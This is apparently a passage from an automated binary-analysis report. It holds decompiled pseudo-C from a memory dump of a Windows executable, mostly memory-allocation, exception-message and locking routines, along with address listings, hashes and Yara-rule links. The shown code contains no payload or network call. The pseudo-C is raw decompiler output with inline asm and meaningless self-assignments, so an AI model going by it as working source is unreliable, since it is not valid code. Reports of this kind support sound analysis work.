						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                                    0x00404464
                                                                                    0x00404464
                                                                                    0x00404464
                                                                                    0x0040446c
                                                                                    0x0040446e
                                                                                    0x004044fc
                                                                                    0x004044ff
                                                                                    0x0040476c
                                                                                    0x0040476d
                                                                                    0x0040476e
                                                                                    0x00404771
                                                                                    0x00403d9c
                                                                                    0x00403d9d
                                                                                    0x00403d9e
                                                                                    0x00403d9f
                                                                                    0x00403da0
                                                                                    0x00403da3
                                                                                    0x00403da5
                                                                                    0x00403dac
                                                                                    0x00403db5
                                                                                    0x00403dba
                                                                                    0x00403ea1
                                                                                    0x00403ea3
                                                                                    0x00403eb6
                                                                                    0x00403eb8
                                                                                    0x00403eba
                                                                                    0x00403ebc
                                                                                    0x00403ec2
                                                                                    0x00403ec6
                                                                                    0x00403ec6
                                                                                    0x00403ec9
                                                                                    0x00403ec9
                                                                                    0x00403ed2
                                                                                    0x00403ed9
                                                                                    0x00403ed9
                                                                                    0x00403ea5
                                                                                    0x00403ea5
                                                                                    0x00403eaa
                                                                                    0x00403eaa
                                                                                    0x00403dc0
                                                                                    0x00403dc9
                                                                                    0x00403dcf
                                                                                    0x00403dcb
                                                                                    0x00403dcb
                                                                                    0x00403dcb
                                                                                    0x00403ddb
                                                                                    0x00403dea
                                                                                    0x00403df7
                                                                                    0x00403e67
                                                                                    0x00403e6e
                                                                                    0x00403e70
                                                                                    0x00403e72
                                                                                    0x00403e74
                                                                                    0x00403e7a
                                                                                    0x00403e7e
                                                                                    0x00403e7e
                                                                                    0x00403e81
                                                                                    0x00403e81
                                                                                    0x00403e91
                                                                                    0x00403e98
                                                                                    0x00403e98
                                                                                    0x00403df9
                                                                                    0x00403df9
                                                                                    0x00403e05
                                                                                    0x00403e0b
                                                                                    0x00000000
                                                                                    0x00403e0d
                                                                                    0x00403e1e
                                                                                    0x00403e22
                                                                                    0x00403e24
                                                                                    0x00403e24
                                                                                    0x00403e3a
                                                                                    0x00000000
                                                                                    0x00403e52
                                                                                    0x00403e54
                                                                                    0x00403e57
                                                                                    0x00403e60
                                                                                    0x00403e63
                                                                                    0x00403e63
                                                                                    0x00403e3a
                                                                                    0x00403e0b
                                                                                    0x00403df7
                                                                                    0x00403ee7
                                                                                    0x00404777
                                                                                    0x00404777
                                                                                    0x00404779
                                                                                    0x00404779
                                                                                    0x00404505
                                                                                    0x00404507
                                                                                    0x0040450a
                                                                                    0x0040450b
                                                                                    0x0040450e
                                                                                    0x00404511
                                                                                    0x00404514
                                                                                    0x00404516
                                                                                    0x00404517
                                                                                    0x0040462c
                                                                                    0x0040462f
                                                                                    0x00404631
                                                                                    0x00404724
                                                                                    0x0040472f
                                                                                    0x00404736
                                                                                    0x00404738
                                                                                    0x0040473b
                                                                                    0x00404740
                                                                                    0x00404741
                                                                                    0x00404743
                                                                                    0x00000000
                                                                                    0x00404745
                                                                                    0x00404745
                                                                                    0x0040474b
                                                                                    0x0040474d
                                                                                    0x0040474d
                                                                                    0x00404750
                                                                                    0x00404758
                                                                                    0x0040475f
                                                                                    0x0040476a
                                                                                    0x0040476a
                                                                                    0x00404637
                                                                                    0x00404637
                                                                                    0x0040463a
                                                                                    0x0040463d
                                                                                    0x0040463f
                                                                                    0x00000000
                                                                                    0x00404645
                                                                                    0x00404645
                                                                                    0x0040464c
                                                                                    0x004046a9
                                                                                    0x004046a9
                                                                                    0x004046ae
                                                                                    0x004046b4
                                                                                    0x004046b9
                                                                                    0x004046ba
                                                                                    0x004046ba
                                                                                    0x004046c6
                                                                                    0x004046d7
                                                                                    0x004046dd
                                                                                    0x004046dd
                                                                                    0x004046df
                                                                                    0x004046ec
                                                                                    0x004046f3
                                                                                    0x004046f7
                                                                                    0x004046f9
                                                                                    0x004046ff
                                                                                    0x00404701
                                                                                    0x00404703
                                                                                    0x00404703
                                                                                    0x004046e1
                                                                                    0x004046e1
                                                                                    0x004046e5
                                                                                    0x004046e5
                                                                                    0x00404708
                                                                                    0x00404708
                                                                                    0x0040470a
                                                                                    0x0040470d
                                                                                    0x00404714
                                                                                    0x00404716
                                                                                    0x0040471a
                                                                                    0x0040464e
                                                                                    0x0040464e
                                                                                    0x00404653
                                                                                    0x0040465b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040465d
                                                                                    0x0040465f
                                                                                    0x00404666
                                                                                    0x00000000
                                                                                    0x00404668
                                                                                    0x0040466c
                                                                                    0x00404671
                                                                                    0x00404672
                                                                                    0x00404678
                                                                                    0x00404680
                                                                                    0x00404686
                                                                                    0x0040468b
                                                                                    0x0040468c
                                                                                    0x00000000
                                                                                    0x0040468c
                                                                                    0x00404680
                                                                                    0x00000000
                                                                                    0x00404666
                                                                                    0x00404695
                                                                                    0x00404698
                                                                                    0x0040469b
                                                                                    0x0040469d
                                                                                    0x0040471d
                                                                                    0x0040471d
                                                                                    0x00000000
                                                                                    0x0040469f
                                                                                    0x0040469f
                                                                                    0x004046a2
                                                                                    0x004046a5
                                                                                    0x004046a7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004046a7
                                                                                    0x0040469d
                                                                                    0x0040464c
                                                                                    0x0040463f
                                                                                    0x0040451d
                                                                                    0x00404520
                                                                                    0x00404522
                                                                                    0x0040452c
                                                                                    0x00404532
                                                                                    0x00404549
                                                                                    0x00404549
                                                                                    0x00404555
                                                                                    0x0040455b
                                                                                    0x0040455d
                                                                                    0x00404564
                                                                                    0x00404566
                                                                                    0x0040456b
                                                                                    0x00404573
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404575
                                                                                    0x00404577
                                                                                    0x0040457e
                                                                                    0x00000000
                                                                                    0x00404580
                                                                                    0x00404583
                                                                                    0x00404588
                                                                                    0x0040458e
                                                                                    0x00404596
                                                                                    0x0040459b
                                                                                    0x004045a0
                                                                                    0x00000000
                                                                                    0x004045a0
                                                                                    0x00404596
                                                                                    0x00000000
                                                                                    0x0040457e
                                                                                    0x004045a9
                                                                                    0x004045a9
                                                                                    0x004045a9
                                                                                    0x004045ae
                                                                                    0x004045b1
                                                                                    0x004045b3
                                                                                    0x004045b6
                                                                                    0x004045b9
                                                                                    0x004045c4
                                                                                    0x004045c6
                                                                                    0x004045c9
                                                                                    0x004045cb
                                                                                    0x004045cd
                                                                                    0x004045d3
                                                                                    0x004045d5
                                                                                    0x004045d5
                                                                                    0x004045bb
                                                                                    0x004045be
                                                                                    0x004045be
                                                                                    0x004045da
                                                                                    0x004045e0
                                                                                    0x004045e4
                                                                                    0x004045ea
                                                                                    0x004045f1
                                                                                    0x004045f1
                                                                                    0x004045f6
                                                                                    0x00404603
                                                                                    0x00404534
                                                                                    0x00404534
                                                                                    0x0040453a
                                                                                    0x00404604
                                                                                    0x00404608
                                                                                    0x0040460d
                                                                                    0x0040460f
                                                                                    0x00404611
                                                                                    0x00404619
                                                                                    0x00404620
                                                                                    0x00404625
                                                                                    0x00404625
                                                                                    0x0040462b
                                                                                    0x00404540
                                                                                    0x00404540
                                                                                    0x00404545
                                                                                    0x00404547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404547
                                                                                    0x0040453a
                                                                                    0x00404524
                                                                                    0x00404524
                                                                                    0x00404528
                                                                                    0x00404528
                                                                                    0x00404522
                                                                                    0x00404517
                                                                                    0x00404474
                                                                                    0x00404474
                                                                                    0x00404476
                                                                                    0x0040447a
                                                                                    0x0040447d
                                                                                    0x0040447f
                                                                                    0x004044b8
                                                                                    0x004044bc
                                                                                    0x004044bd
                                                                                    0x004044bf
                                                                                    0x004044c1
                                                                                    0x004044c3
                                                                                    0x004044c6
                                                                                    0x004044c8
                                                                                    0x004044ca
                                                                                    0x004044cf
                                                                                    0x004044d1
                                                                                    0x004044d3
                                                                                    0x004044d9
                                                                                    0x004044db
                                                                                    0x004044db
                                                                                    0x004044e2
                                                                                    0x004044e2
                                                                                    0x004044e5
                                                                                    0x004044e7
                                                                                    0x004044f0
                                                                                    0x004044f5
                                                                                    0x004044f5
                                                                                    0x004044f7
                                                                                    0x004044f8
                                                                                    0x004044f9
                                                                                    0x004044fa
                                                                                    0x00404481
                                                                                    0x00404481
                                                                                    0x00404488
                                                                                    0x0040448a
                                                                                    0x00404490
                                                                                    0x00404492
                                                                                    0x00404494
                                                                                    0x00404499
                                                                                    0x0040449b
                                                                                    0x0040449d
                                                                                    0x0040449f
                                                                                    0x004044a1
                                                                                    0x004044ac
                                                                                    0x004044b1
                                                                                    0x004044b1
                                                                                    0x004044b3
                                                                                    0x004044b4
                                                                                    0x004044b5
                                                                                    0x0040448c
                                                                                    0x0040448c
                                                                                    0x0040448d
                                                                                    0x0040448e
                                                                                    0x0040448e
                                                                                    0x0040448a
                                                                                    0x0040447f

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                    • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                                                    • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                    • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 68%
                                                                                    			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}






































                                                                                    0x0041f7a0
                                                                                    0x0041f7a1
                                                                                    0x0041f7ad
                                                                                    0x0041f7b3
                                                                                    0x0041f7b9
                                                                                    0x0041f7bf
                                                                                    0x0041f7c5
                                                                                    0x0041f7ca
                                                                                    0x0041f7cb
                                                                                    0x0041f7d0
                                                                                    0x0041f7d3
                                                                                    0x0041f7df
                                                                                    0x0041f7df
                                                                                    0x0041f7e2
                                                                                    0x0041f7f0
                                                                                    0x0041f7f5
                                                                                    0x0041f7e4
                                                                                    0x0041f7e4
                                                                                    0x0041f7ff
                                                                                    0x0041f804
                                                                                    0x0041f7e6
                                                                                    0x0041f7e9
                                                                                    0x0041f80e
                                                                                    0x0041f813
                                                                                    0x0041f7eb
                                                                                    0x0041f81d
                                                                                    0x0041f822
                                                                                    0x0041f822
                                                                                    0x0041f7e9
                                                                                    0x0041f7e4
                                                                                    0x0041f82d
                                                                                    0x0041f840
                                                                                    0x0041f845
                                                                                    0x0041f84e
                                                                                    0x0041f86c
                                                                                    0x0041f871
                                                                                    0x0041f873
                                                                                    0x00000000
                                                                                    0x0041f879
                                                                                    0x0041f882
                                                                                    0x0041f888
                                                                                    0x0041f8a0
                                                                                    0x0041f8b1
                                                                                    0x0041f8bc
                                                                                    0x0041f8c2
                                                                                    0x0041f8cc
                                                                                    0x0041f8d2
                                                                                    0x0041f8d9
                                                                                    0x0041f8df
                                                                                    0x0041f8ec
                                                                                    0x0041f8f5
                                                                                    0x0041f8fa
                                                                                    0x0041f90c
                                                                                    0x0041f911
                                                                                    0x0041f915
                                                                                    0x0041f915
                                                                                    0x0041f91e
                                                                                    0x0041f924
                                                                                    0x0041f92e
                                                                                    0x0041f934
                                                                                    0x0041f93b
                                                                                    0x0041f941
                                                                                    0x0041f94e
                                                                                    0x0041f957
                                                                                    0x0041f95c
                                                                                    0x0041f96e
                                                                                    0x0041f973
                                                                                    0x0041f977
                                                                                    0x0041f97a
                                                                                    0x0041f97d
                                                                                    0x0041f988
                                                                                    0x0041f998
                                                                                    0x0041f9a5

                                                                                    APIs
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                                                      • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                    • String ID: 0@$8@$@@$H@
                                                                                    • API String ID: 902310565-4161625419
                                                                                    • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                    • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                                                    • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                    • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 88%
                                                                                    			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                                    0x0040668f
                                                                                    0x00406691
                                                                                    0x00406693
                                                                                    0x00406696
                                                                                    0x00406696
                                                                                    0x0040669d
                                                                                    0x004066a4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004066b2
                                                                                    0x004066b9
                                                                                    0x00406751
                                                                                    0x00406751
                                                                                    0x00406751
                                                                                    0x00406755
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406760
                                                                                    0x00406766
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406768
                                                                                    0x00406768
                                                                                    0x0040676d
                                                                                    0x00406773
                                                                                    0x0040677a
                                                                                    0x00406784
                                                                                    0x00406789
                                                                                    0x00406790
                                                                                    0x00406797
                                                                                    0x004067a5
                                                                                    0x004067b3
                                                                                    0x004067a7
                                                                                    0x004067af
                                                                                    0x004067af
                                                                                    0x004067a5
                                                                                    0x004067b9
                                                                                    0x004067db
                                                                                    0x004067e4
                                                                                    0x004067e8
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x004067bb
                                                                                    0x004067bb
                                                                                    0x004067c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067cc
                                                                                    0x004067d2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067d4
                                                                                    0x00000000
                                                                                    0x004067d4
                                                                                    0x004067bb
                                                                                    0x004067f1
                                                                                    0x004067f1
                                                                                    0x00406800
                                                                                    0x00406807
                                                                                    0x0040680a
                                                                                    0x0040680a
                                                                                    0x00000000
                                                                                    0x00406800
                                                                                    0x00000000
                                                                                    0x00406751
                                                                                    0x004066c4
                                                                                    0x004066ca
                                                                                    0x004066d0
                                                                                    0x0040672c
                                                                                    0x0040672f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406736
                                                                                    0x0040673e
                                                                                    0x00406744
                                                                                    0x0040674f
                                                                                    0x00000000
                                                                                    0x0040674f
                                                                                    0x00406746
                                                                                    0x00000000
                                                                                    0x00406746
                                                                                    0x00000000
                                                                                    0x004066d2
                                                                                    0x004066d5
                                                                                    0x00000000
                                                                                    0x004066e4
                                                                                    0x004066e4
                                                                                    0x004066e4
                                                                                    0x00000000
                                                                                    0x004066ed
                                                                                    0x004066f0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00406727
                                                                                    0x0040672a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040672a
                                                                                    0x004066fe
                                                                                    0x00406704
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00406715
                                                                                    0x00000000
                                                                                    0x00406715
                                                                                    0x00406811
                                                                                    0x0040681c

                                                                                    APIs
                                                                                      • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                                                    • GetTickCount.KERNEL32 ref: 004066BF
